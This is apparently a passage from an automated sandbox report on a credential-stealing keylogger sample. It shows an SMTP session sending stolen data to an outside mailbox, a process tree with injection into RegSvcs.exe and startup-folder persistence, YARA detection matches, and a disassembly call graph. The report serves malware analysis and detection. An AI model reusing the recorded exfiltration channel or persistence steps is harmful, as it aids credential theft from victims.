                                                  Sep 18, 2024 15:26:43.181026936 CEST58749740208.91.198.143192.168.2.7250 2.1.0 Ok
                                                  Sep 18, 2024 15:26:43.181200981 CEST49740587192.168.2.7208.91.198.143RCPT TO:<resultlog62@gmail.com>
                                                  Sep 18, 2024 15:26:43.360907078 CEST58749740208.91.198.143192.168.2.7250 2.1.5 Ok
                                                  Sep 18, 2024 15:26:43.361311913 CEST49740587192.168.2.7208.91.198.143DATA
                                                  Sep 18, 2024 15:26:43.692055941 CEST58749740208.91.198.143192.168.2.7354 End data with <CR><LF>.<CR><LF>
                                                  Sep 18, 2024 15:26:43.693985939 CEST49740587192.168.2.7208.91.198.143.
                                                  Sep 18, 2024 15:26:44.086220980 CEST58749740208.91.198.143192.168.2.7250 2.0.0 Ok: queued as 464E4B8040A
                                                  Sep 18, 2024 15:28:08.176207066 CEST49732587192.168.2.7208.91.198.143QUIT
                                                  Sep 18, 2024 15:28:08.331727028 CEST58749732208.91.198.143192.168.2.7221 2.0.0 Bye
                                                  Sep 18, 2024 15:28:21.316992998 CEST49740587192.168.2.7208.91.198.143QUIT
                                                  Sep 18, 2024 15:28:21.474251986 CEST58749740208.91.198.143192.168.2.7221 2.0.0 Bye

                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:09:25:58
                                                  Start date:18/09/2024
                                                  Path:C:\Users\user\Desktop\z1newpo.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\z1newpo.exe"
                                                  Imagebase:0x400000
                                                  File size:1'342'755 bytes
                                                  MD5 hash:C087116B5A47A54E5DD272162FD87B3B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:2
                                                  Start time:09:25:59
                                                  Start date:18/09/2024
                                                  Path:C:\Users\user\AppData\Local\directory\name.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\z1newpo.exe"
                                                  Imagebase:0x400000
                                                  File size:1'342'755 bytes
                                                  MD5 hash:C087116B5A47A54E5DD272162FD87B3B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 74%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:3
                                                  Start time:09:25:59
                                                  Start date:18/09/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\z1newpo.exe"
                                                  Imagebase:0x2a0000
                                                  File size:45'984 bytes
                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.3688609885.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3684808762.00000000003AD000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3688609885.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:11
                                                  Start time:09:26:12
                                                  Start date:18/09/2024
                                                  Path:C:\Windows\System32\wscript.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                                                  Imagebase:0x7ff6213c0000
                                                  File size:170'496 bytes
                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:12
                                                  Start time:09:26:12
                                                  Start date:18/09/2024
                                                  Path:C:\Users\user\AppData\Local\directory\name.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                                                  Imagebase:0x400000
                                                  File size:1'342'755 bytes
                                                  MD5 hash:C087116B5A47A54E5DD272162FD87B3B
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:13
                                                  Start time:09:26:13
                                                  Start date:18/09/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                                                  Imagebase:0x260000
                                                  File size:45'984 bytes
                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000D.00000002.3689181352.0000000002823000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:false

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:3.1%
                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                    Signature Coverage:8.8%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:36
                                                    execution_graph 86079 4010e0 86082 401100 86079->86082 86081 4010f8 86083 401113 86082->86083 86084 401182 86083->86084 86085 401120 86083->86085 86086 401184 86083->86086 86087 40114c 86083->86087 86088 40112c DefWindowProcW 86084->86088 86085->86088 86127 401000 Shell_NotifyIconW __localtime64_s 86085->86127 86120 401250 61 API calls __localtime64_s 86086->86120 86090 401151 86087->86090 86091 40119d 86087->86091 86088->86081 86095 401219 86090->86095 86096 40115d 86090->86096 86093 4011a3 86091->86093 86094 42afb4 86091->86094 86092 401193 86092->86081 86093->86085 86102 4011b6 KillTimer 86093->86102 86103 4011db SetTimer RegisterWindowMessageW 86093->86103 86122 40f190 10 API calls 86094->86122 86095->86085 86099 401225 86095->86099 86097 401163 86096->86097 86098 42b01d 86096->86098 86104 42afe9 86097->86104 86105 40116c 86097->86105 86098->86088 86126 4370f4 52 API calls 86098->86126 86138 468b0e 74 API calls __localtime64_s 86099->86138 86121 401000 Shell_NotifyIconW __localtime64_s 86102->86121 86103->86092 86111 401204 CreatePopupMenu 86103->86111 86124 40f190 10 API calls 86104->86124 86105->86085 86113 401174 86105->86113 86106 42b04f 86128 40e0c0 86106->86128 86111->86081 86123 45fd57 65 API calls __localtime64_s 86113->86123 86114 42b00e 86125 401a50 331 API calls 86114->86125 86115 4011c9 PostQuitMessage 86115->86081 86118 42afdc 86118->86088 86119 42afe4 86118->86119 86119->86092 86120->86092 86121->86115 86122->86092 86123->86118 86124->86114 86125->86084 86126->86084 86127->86106 86129 40e0e7 __localtime64_s 86128->86129 86130 40e142 86129->86130 86132 42729f DestroyIcon 86129->86132 86131 40e184 86130->86131 86161 4341e6 63 API calls __wcsicoll 86130->86161 86134 40e1a0 Shell_NotifyIconW 86131->86134 86135 4272db Shell_NotifyIconW 86131->86135 86132->86130 86139 401b80 86134->86139 86137 40e1ba 86137->86084 86138->86119 86140 401b9c 86139->86140 86160 401c7e 86139->86160 86162 4013c0 86140->86162 86143 42722b LoadStringW 86146 427246 86143->86146 86144 401bb9 86167 402160 86144->86167 86181 40e0a0 86146->86181 86147 401bcd 86149 427258 86147->86149 86150 401bda 86147->86150 86185 40d200 52 API calls 2 library calls 86149->86185 86150->86146 86152 401be4 86150->86152 86151 401bf3 __localtime64_s _wcscpy _wcsncpy 86159 401c62 Shell_NotifyIconW 86151->86159 86180 40d200 52 API calls 2 library calls 86152->86180 86155 427267 86155->86151 86156 42727b 86155->86156 86186 40d200 52 API calls 2 library calls 86156->86186 86158 427289 86159->86160 86160->86137 86161->86131 86187 4115d7 86162->86187 86168 426daa 86167->86168 86169 40216b _wcslen 86167->86169 86225 40c600 86168->86225 86172 402180 86169->86172 86173 40219e 86169->86173 86171 426db5 86171->86147 86224 403bd0 52 API calls ctype 86172->86224 86175 4013a0 52 API calls 86173->86175 86176 4021a5 86175->86176 86178 426db7 86176->86178 86179 4115d7 52 API calls 86176->86179 86177 402187 _memmove 86177->86147 86179->86177 86180->86151 86182 40e0b2 86181->86182 86183 40e0a8 86181->86183 86182->86151 86237 403c30 52 API calls _memmove 86183->86237 86185->86155 86186->86158 86188 4115e1 _malloc 86187->86188 86190 4013e4 86188->86190 86193 4115fd std::exception::exception 86188->86193 86201 4135bb 86188->86201 86198 4013a0 86190->86198 86191 41163b 86216 4180af 46 API calls std::exception::operator= 86191->86216 86193->86191 86215 41130a 51 API calls __cinit 86193->86215 86194 411645 86217 418105 RaiseException 86194->86217 86197 411656 86199 4115d7 52 API calls 86198->86199 86200 4013a7 86199->86200 86200->86143 86200->86144 86202 413638 _malloc 86201->86202 86212 4135c9 _malloc 86201->86212 86223 417f77 46 API calls __getptd_noexit 86202->86223 86205 4135f7 RtlAllocateHeap 86205->86212 86214 413630 86205->86214 86207 413624 86221 417f77 46 API calls __getptd_noexit 86207->86221 86210 413622 86222 417f77 46 API calls __getptd_noexit 86210->86222 86211 4135d4 86211->86212 86218 418901 46 API calls __NMSG_WRITE 86211->86218 86219 418752 46 API calls 7 library calls 86211->86219 86220 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86211->86220 86212->86205 86212->86207 86212->86210 86212->86211 86214->86188 86215->86191 86216->86194 86217->86197 86218->86211 86219->86211 86221->86210 86222->86214 86223->86214 86224->86177 86226 40c619 86225->86226 86227 40c60a 86225->86227 86226->86171 86227->86226 86230 4026f0 86227->86230 86229 426d7a _memmove 86229->86171 86231 426873 86230->86231 86232 4026ff 86230->86232 86233 4013a0 52 API calls 86231->86233 86232->86229 86234 42687b 86233->86234 86235 4115d7 52 API calls 86234->86235 86236 42689e _memmove 86235->86236 86236->86229 86237->86182 86238 40bd20 86240 428194 86238->86240 86241 40bd2d 86238->86241 86239 40bd43 86240->86239 86243 4281bc 86240->86243 86244 4281b2 86240->86244 86248 40bd37 86241->86248 86261 4531b1 85 API calls 5 library calls 86241->86261 86260 45e987 86 API calls ctype 86243->86260 86259 40b510 VariantClear 86244->86259 86250 40bd50 86248->86250 86249 4281ba 86251 426cf1 86250->86251 86252 40bd63 86250->86252 86271 44cde9 52 API calls _memmove 86251->86271 86262 40bd80 86252->86262 86255 40bd73 86255->86239 86256 426cfc 86257 40e0a0 52 API calls 86256->86257 86258 426d02 86257->86258 86259->86249 86260->86241 86261->86248 86263 40bd8e 86262->86263 86270 40bdb7 _memmove 86262->86270 86264 40bded 86263->86264 86265 40bdad 86263->86265 86263->86270 86266 4115d7 52 API calls 86264->86266 86272 402f00 86265->86272 86268 40bdf6 86266->86268 86269 4115d7 52 API calls 86268->86269 86268->86270 86269->86270 86270->86255 86271->86256 86273 402f10 86272->86273 86274 402f0c 86272->86274 86275 4268c3 86273->86275 86276 4115d7 52 API calls 86273->86276 86274->86270 86277 402f51 ctype _memmove 86276->86277 86277->86270 86278 425ba2 86283 40e360 86278->86283 86280 425bb4 86299 41130a 51 API calls __cinit 86280->86299 86282 425bbe 86284 4115d7 52 API calls 86283->86284 86285 40e3ec GetModuleFileNameW 86284->86285 86300 413a0e 86285->86300 86287 40e421 _wcsncat 86303 413a9e 86287->86303 86290 4115d7 52 API calls 86291 40e45e _wcscpy 86290->86291 86306 40bc70 86291->86306 86295 40e4a9 86295->86280 86296 401c90 52 API calls 86298 40e4a1 _wcscat _wcslen _wcsncpy 86296->86298 86297 4115d7 52 API calls 86297->86298 86298->86295 86298->86296 86298->86297 86299->86282 86325 413801 86300->86325 86355 419efd 86303->86355 86307 4115d7 52 API calls 86306->86307 86308 40bc98 86307->86308 86309 4115d7 52 API calls 86308->86309 86310 40bca6 86309->86310 86311 40e4c0 86310->86311 86367 403350 86311->86367 86313 40e4cb RegOpenKeyExW 86314 427190 RegQueryValueExW 86313->86314 86315 40e4eb 86313->86315 86316 4271b0 86314->86316 86317 42721a RegCloseKey 86314->86317 86315->86298 86318 4115d7 52 API calls 86316->86318 86317->86298 86319 4271cb 86318->86319 86374 43652f 52 API calls 86319->86374 86321 4271d8 RegQueryValueExW 86322 4271f7 86321->86322 86324 42720e 86321->86324 86323 402160 52 API calls 86322->86323 86323->86324 86324->86317 86327 41389e 86325->86327 86332 41381a 86325->86332 86326 4139e8 86352 417f77 46 API calls __getptd_noexit 86326->86352 86327->86326 86329 413a00 86327->86329 86354 417f77 46 API calls __getptd_noexit 86329->86354 86330 4139ed 86353 417f25 10 API calls _W_expandtime 86330->86353 86332->86327 86339 41388a 86332->86339 86347 419e30 46 API calls _W_expandtime 86332->86347 86335 41396c 86335->86327 86336 413967 86335->86336 86340 41397a 86335->86340 86336->86287 86337 413929 86337->86327 86338 413945 86337->86338 86349 419e30 46 API calls _W_expandtime 86337->86349 86338->86327 86338->86336 86343 41395b 86338->86343 86339->86327 86346 413909 86339->86346 86348 419e30 46 API calls _W_expandtime 86339->86348 86351 419e30 46 API calls _W_expandtime 86340->86351 86350 419e30 46 API calls _W_expandtime 86343->86350 86346->86335 86346->86337 86347->86339 86348->86346 86349->86338 86350->86336 86351->86336 86352->86330 86353->86336 86354->86336 86356 419f13 86355->86356 86357 419f0e 86355->86357 86364 417f77 46 API calls __getptd_noexit 86356->86364 86357->86356 86363 419f2b 86357->86363 86359 419f18 86365 417f25 10 API calls _W_expandtime 86359->86365 86362 40e454 86362->86290 86363->86362 86366 417f77 46 API calls __getptd_noexit 86363->86366 86364->86359 86365->86362 86366->86359 86368 403367 86367->86368 86369 403358 86367->86369 86370 4115d7 52 API calls 86368->86370 86369->86313 86371 403370 86370->86371 86372 4115d7 52 API calls 86371->86372 86373 40339e 86372->86373 86373->86313 86374->86321 86375 416454 86412 416c70 86375->86412 86377 416460 GetStartupInfoW 86378 416474 86377->86378 86413 419d5a HeapCreate 86378->86413 86380 4164cd 86381 4164d8 86380->86381 86497 41642b 46 API calls 3 library calls 86380->86497 86414 417c20 GetModuleHandleW 86381->86414 86384 4164de 86385 4164e9 __RTC_Initialize 86384->86385 86498 41642b 46 API calls 3 library calls 86384->86498 86433 41aaa1 GetStartupInfoW 86385->86433 86389 416503 GetCommandLineW 86446 41f584 GetEnvironmentStringsW 86389->86446 86393 416513 86452 41f4d6 GetModuleFileNameW 86393->86452 86395 41651d 86396 416528 86395->86396 86500 411924 46 API calls 3 library calls 86395->86500 86456 41f2a4 86396->86456 86399 41652e 86400 416539 86399->86400 86501 411924 46 API calls 3 library calls 86399->86501 86470 411703 86400->86470 86403 416541 86405 41654c __wwincmdln 86403->86405 86502 411924 46 API calls 3 library calls 86403->86502 86474 40d6b0 86405->86474 86408 41657c 86504 411906 46 API calls _doexit 86408->86504 86411 416581 _doexit 86412->86377 86413->86380 86415 417c34 86414->86415 86416 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86414->86416 86505 4178ff 49 API calls _free 86415->86505 86418 417c87 TlsAlloc 86416->86418 86421 417cd5 TlsSetValue 86418->86421 86422 417d96 86418->86422 86419 417c39 86419->86384 86421->86422 86423 417ce6 __init_pointers 86421->86423 86422->86384 86506 418151 InitializeCriticalSectionAndSpinCount 86423->86506 86425 417d91 86514 4178ff 49 API calls _free 86425->86514 86427 417d2a 86427->86425 86507 416b49 86427->86507 86430 417d76 86513 41793c 46 API calls 4 library calls 86430->86513 86432 417d7e GetCurrentThreadId 86432->86422 86434 416b49 __calloc_crt 46 API calls 86433->86434 86443 41aabf 86434->86443 86435 41ac6a GetStdHandle 86440 41ac34 86435->86440 86436 416b49 __calloc_crt 46 API calls 86436->86443 86437 41acce SetHandleCount 86445 4164f7 86437->86445 86438 41ac7c GetFileType 86438->86440 86439 41abb4 86439->86440 86441 41abe0 GetFileType 86439->86441 86442 41abeb InitializeCriticalSectionAndSpinCount 86439->86442 86440->86435 86440->86437 86440->86438 86444 41aca2 InitializeCriticalSectionAndSpinCount 86440->86444 86441->86439 86441->86442 86442->86439 86442->86445 86443->86436 86443->86439 86443->86440 86443->86445 86444->86440 86444->86445 86445->86389 86499 411924 46 API calls 3 library calls 86445->86499 86447 41f595 86446->86447 86448 41f599 86446->86448 86447->86393 86448->86448 86524 416b04 86448->86524 86450 41f5bb _memmove 86451 41f5c2 FreeEnvironmentStringsW 86450->86451 86451->86393 86453 41f50b _wparse_cmdline 86452->86453 86454 416b04 __malloc_crt 46 API calls 86453->86454 86455 41f54e _wparse_cmdline 86453->86455 86454->86455 86455->86395 86457 41f2bc _wcslen 86456->86457 86461 41f2b4 86456->86461 86458 416b49 __calloc_crt 46 API calls 86457->86458 86463 41f2e0 _wcslen 86458->86463 86459 41f336 86531 413748 86459->86531 86461->86399 86462 416b49 __calloc_crt 46 API calls 86462->86463 86463->86459 86463->86461 86463->86462 86464 41f35c 86463->86464 86467 41f373 86463->86467 86530 41ef12 46 API calls _W_expandtime 86463->86530 86466 413748 _free 46 API calls 86464->86466 86466->86461 86537 417ed3 86467->86537 86469 41f37f 86469->86399 86471 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86470->86471 86473 411750 __IsNonwritableInCurrentImage 86471->86473 86556 41130a 51 API calls __cinit 86471->86556 86473->86403 86475 42e2f3 86474->86475 86476 40d6cc 86474->86476 86557 408f40 86476->86557 86478 40d707 86561 40ebb0 86478->86561 86485 40d751 86576 40f4e0 SystemParametersInfoW SystemParametersInfoW 86485->86576 86486 40d737 86564 411951 86486->86564 86488 40d75f 86577 40d590 GetCurrentDirectoryW 86488->86577 86490 40d767 SystemParametersInfoW 86491 40d794 86490->86491 86492 40d78d FreeLibrary 86490->86492 86493 408f40 VariantClear 86491->86493 86492->86491 86494 40d79d 86493->86494 86495 408f40 VariantClear 86494->86495 86496 40d7a6 86495->86496 86496->86408 86503 4118da 46 API calls _doexit 86496->86503 86497->86381 86498->86385 86503->86408 86504->86411 86505->86419 86506->86427 86509 416b52 86507->86509 86510 416b8f 86509->86510 86511 416b70 Sleep 86509->86511 86515 41f677 86509->86515 86510->86425 86510->86430 86512 416b85 86511->86512 86512->86509 86512->86510 86513->86432 86514->86422 86516 41f683 86515->86516 86517 41f69e _malloc 86515->86517 86516->86517 86518 41f68f 86516->86518 86520 41f6b1 HeapAlloc 86517->86520 86522 41f6d8 86517->86522 86523 417f77 46 API calls __getptd_noexit 86518->86523 86520->86517 86520->86522 86521 41f694 86521->86509 86522->86509 86523->86521 86527 416b0d 86524->86527 86525 4135bb _malloc 45 API calls 86525->86527 86526 416b43 86526->86450 86527->86525 86527->86526 86528 416b24 Sleep 86527->86528 86529 416b39 86528->86529 86529->86526 86529->86527 86530->86463 86532 41377c _free 86531->86532 86533 413753 RtlFreeHeap 86531->86533 86532->86461 86533->86532 86534 413768 86533->86534 86540 417f77 46 API calls __getptd_noexit 86534->86540 86536 41376e GetLastError 86536->86532 86541 417daa 86537->86541 86540->86536 86542 417dc9 __localtime64_s __call_reportfault 86541->86542 86543 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86542->86543 86544 417eb5 __call_reportfault 86543->86544 86547 41a208 86544->86547 86546 417ed1 GetCurrentProcess TerminateProcess 86546->86469 86548 41a210 86547->86548 86549 41a212 IsDebuggerPresent 86547->86549 86548->86546 86555 41fe19 86549->86555 86552 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86553 421ff0 __call_reportfault 86552->86553 86554 421ff8 GetCurrentProcess TerminateProcess 86552->86554 86553->86554 86554->86546 86555->86552 86556->86473 86558 408f48 ctype 86557->86558 86559 4265c7 VariantClear 86558->86559 86560 408f55 ctype 86558->86560 86559->86560 86560->86478 86617 40ebd0 86561->86617 86621 4182cb 86564->86621 86566 41195e 86628 4181f2 LeaveCriticalSection 86566->86628 86568 40d748 86569 4119b0 86568->86569 86570 4119d6 86569->86570 86571 4119bc 86569->86571 86570->86485 86571->86570 86663 417f77 46 API calls __getptd_noexit 86571->86663 86573 4119c6 86664 417f25 10 API calls _W_expandtime 86573->86664 86575 4119d1 86575->86485 86576->86488 86665 401f20 86577->86665 86579 40d5b6 IsDebuggerPresent 86580 40d5c4 86579->86580 86581 42e1bb MessageBoxA 86579->86581 86582 42e1d4 86580->86582 86583 40d5e3 86580->86583 86581->86582 86837 403a50 52 API calls 3 library calls 86582->86837 86735 40f520 86583->86735 86587 40d5fd GetFullPathNameW 86747 401460 86587->86747 86589 40d63b 86590 40d643 86589->86590 86592 42e231 SetCurrentDirectoryW 86589->86592 86591 40d64c 86590->86591 86838 432fee 6 API calls 86590->86838 86762 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86591->86762 86592->86590 86595 42e252 86595->86591 86597 42e25a GetModuleFileNameW 86595->86597 86599 42e274 86597->86599 86600 42e2cb GetForegroundWindow ShellExecuteW 86597->86600 86839 401b10 86599->86839 86604 40d688 86600->86604 86601 40d656 86603 40d669 86601->86603 86606 40e0c0 74 API calls 86601->86606 86770 4091e0 86603->86770 86608 40d692 SetCurrentDirectoryW 86604->86608 86606->86603 86608->86490 86611 42e28d 86846 40d200 52 API calls 2 library calls 86611->86846 86614 42e299 GetForegroundWindow ShellExecuteW 86615 42e2c6 86614->86615 86615->86604 86616 40ec00 LoadLibraryA GetProcAddress 86616->86486 86618 40d72e 86617->86618 86619 40ebd6 LoadLibraryA 86617->86619 86618->86486 86618->86616 86619->86618 86620 40ebe7 GetProcAddress 86619->86620 86620->86618 86622 4182e0 86621->86622 86623 4182f3 EnterCriticalSection 86621->86623 86629 418209 86622->86629 86623->86566 86625 4182e6 86625->86623 86656 411924 46 API calls 3 library calls 86625->86656 86628->86568 86630 418215 _doexit 86629->86630 86631 418225 86630->86631 86632 41823d 86630->86632 86657 418901 46 API calls __NMSG_WRITE 86631->86657 86635 416b04 __malloc_crt 45 API calls 86632->86635 86640 41824b _doexit 86632->86640 86634 41822a 86658 418752 46 API calls 7 library calls 86634->86658 86636 418256 86635->86636 86638 41825d 86636->86638 86639 41826c 86636->86639 86660 417f77 46 API calls __getptd_noexit 86638->86660 86643 4182cb __lock 45 API calls 86639->86643 86640->86625 86641 418231 86659 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86641->86659 86645 418273 86643->86645 86647 4182a6 86645->86647 86648 41827b InitializeCriticalSectionAndSpinCount 86645->86648 86651 413748 _free 45 API calls 86647->86651 86649 418297 86648->86649 86650 41828b 86648->86650 86662 4182c2 LeaveCriticalSection _doexit 86649->86662 86652 413748 _free 45 API calls 86650->86652 86651->86649 86654 418291 86652->86654 86661 417f77 46 API calls __getptd_noexit 86654->86661 86657->86634 86658->86641 86660->86640 86661->86649 86662->86640 86663->86573 86664->86575 86847 40e6e0 86665->86847 86669 401f41 GetModuleFileNameW 86865 410100 86669->86865 86671 401f5c 86877 410960 86671->86877 86674 401b10 52 API calls 86675 401f81 86674->86675 86880 401980 86675->86880 86677 401f8e 86678 408f40 VariantClear 86677->86678 86679 401f9d 86678->86679 86680 401b10 52 API calls 86679->86680 86681 401fb4 86680->86681 86682 401980 53 API calls 86681->86682 86683 401fc3 86682->86683 86684 401b10 52 API calls 86683->86684 86685 401fd2 86684->86685 86888 40c2c0 86685->86888 86687 401fe1 86688 40bc70 52 API calls 86687->86688 86689 401ff3 86688->86689 86906 401a10 86689->86906 86691 401ffe 86913 4114ab 86691->86913 86694 428b05 86696 401a10 52 API calls 86694->86696 86695 402017 86697 4114ab __wcsicoll 58 API calls 86695->86697 86698 428b18 86696->86698 86699 402022 86697->86699 86701 401a10 52 API calls 86698->86701 86699->86698 86700 40202d 86699->86700 86702 4114ab __wcsicoll 58 API calls 86700->86702 86703 428b33 86701->86703 86704 402038 86702->86704 86706 428b3b GetModuleFileNameW 86703->86706 86705 402043 86704->86705 86704->86706 86707 4114ab __wcsicoll 58 API calls 86705->86707 86708 401a10 52 API calls 86706->86708 86709 40204e 86707->86709 86710 428b6c 86708->86710 86711 402092 86709->86711 86716 401a10 52 API calls 86709->86716 86718 428b90 _wcscpy 86709->86718 86712 40e0a0 52 API calls 86710->86712 86713 4020a3 86711->86713 86711->86718 86714 428b7a 86712->86714 86715 428bc6 86713->86715 86921 40e830 53 API calls 86713->86921 86717 401a10 52 API calls 86714->86717 86720 402073 _wcscpy 86716->86720 86721 428b88 86717->86721 86722 401a10 52 API calls 86718->86722 86726 401a10 52 API calls 86720->86726 86721->86718 86730 4020d0 86722->86730 86723 4020bb 86922 40cf00 53 API calls 86723->86922 86725 4020c6 86727 408f40 VariantClear 86725->86727 86726->86711 86727->86730 86728 402110 86732 408f40 VariantClear 86728->86732 86730->86728 86733 401a10 52 API calls 86730->86733 86923 40cf00 53 API calls 86730->86923 86924 40e6a0 53 API calls 86730->86924 86734 402120 ctype 86732->86734 86733->86730 86734->86579 86736 4295c9 __localtime64_s 86735->86736 86737 40f53c 86735->86737 86740 4295d9 GetOpenFileNameW 86736->86740 87604 410120 86737->87604 86739 40f545 87608 4102b0 SHGetMalloc 86739->87608 86740->86737 86742 40d5f5 86740->86742 86742->86587 86742->86589 86743 40f54c 87613 410190 GetFullPathNameW 86743->87613 86745 40f559 87624 40f570 86745->87624 87686 402400 86747->87686 86749 40146f 86752 428c29 _wcscat 86749->86752 87695 401500 86749->87695 86751 40147c 86751->86752 87703 40d440 86751->87703 86754 401489 86754->86752 86755 401491 GetFullPathNameW 86754->86755 86756 402160 52 API calls 86755->86756 86757 4014bb 86756->86757 86758 402160 